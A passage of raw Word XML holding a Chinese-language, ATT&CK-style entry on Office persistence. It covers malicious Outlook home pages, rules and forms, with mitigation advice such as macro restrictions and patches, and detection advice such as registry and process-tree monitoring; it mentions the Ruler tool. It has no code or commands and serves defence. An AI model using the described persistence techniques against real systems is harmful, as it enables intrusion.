        <w:t>恶意主页，用户邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新加载正确的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹时会执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>恶意主页。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，攻击者发送特制邮件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户时，会执行恶意规则或表单。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FD8B9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00557D03" w14:paraId="6A5E34BE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="316A01D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4AD50CF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="41AAD99F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1A49E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId63" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特性</w:t>
              </w:r>
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>程序</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>禁用或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A91AD1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>遵循适合您环境的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>宏安全最佳实践。禁止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office VBA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>宏。禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加载项。如果需要，请遵循最佳实践来保护它们，方法是要求对其签名并禁用允许加载项的用户通知。对于某些加载项类型（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VBA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），可能需要额外的措施，因为在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信任中心禁用加载项并不会禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，也不会阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VBA</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7FDDD7BA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="526B897E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028693B9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对于利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>情况</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，创建用来执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>此</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表项并将其权限设置为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>读取控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，防止攻击者在没有管理员权限的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>情况下轻松访问密钥或防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>提升的要求。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="05AE5937" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA9EB43" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId64" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB36174" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对于利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Outlook</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的情况，仅仅阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>宏使用是</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>没有</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>效果的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，因为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Visual Basic</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>引擎与宏脚本引擎是分开的。微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>已经发布了</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>补丁</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设法</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>解决这些问题。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统已做如下更新</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>KB3191938</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Outlook Visual Basic</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并显示恶意代码警告；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>KB4011091</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，默认情况下禁用自定义表单；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>KB4011162</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，删除老的主页功能</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CA13DB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C8774F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595DA88" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的持久性机制要求更改注册表，并将二进制、文件或脚本写入磁盘或修改现有文件使其包含恶意脚本。收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册表项创建和修改相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>表项。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>研究基本模板（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ormal.dotm</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的修改点，因为基本模板可能不包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宏。还应调查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宏安全设置的修改点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED5C2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控并验证文件系统上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受信任位置，并审核与启用加载项相关的注册表项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5790B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非标准进程执行树也可能指示可疑或恶意行为。收集进程执行信息，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PPID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（父进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），并查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程导致的异常活动链。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其他攻击技术相关的可疑进程或活动的父进程是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winword.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可能表示该应用被恶意使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00318746" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则和表单的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，微软已发布</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本来妥善收集邮件环境中的邮件转发规则和自定义表单以及解释输出的步骤。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SensePos</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uler</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>被攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来执行恶意规则、表单和主页攻击。针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这种情况，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ensePost</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布了一个工具来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uler</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F279B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径拦截</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0A447819" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="513F0800" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
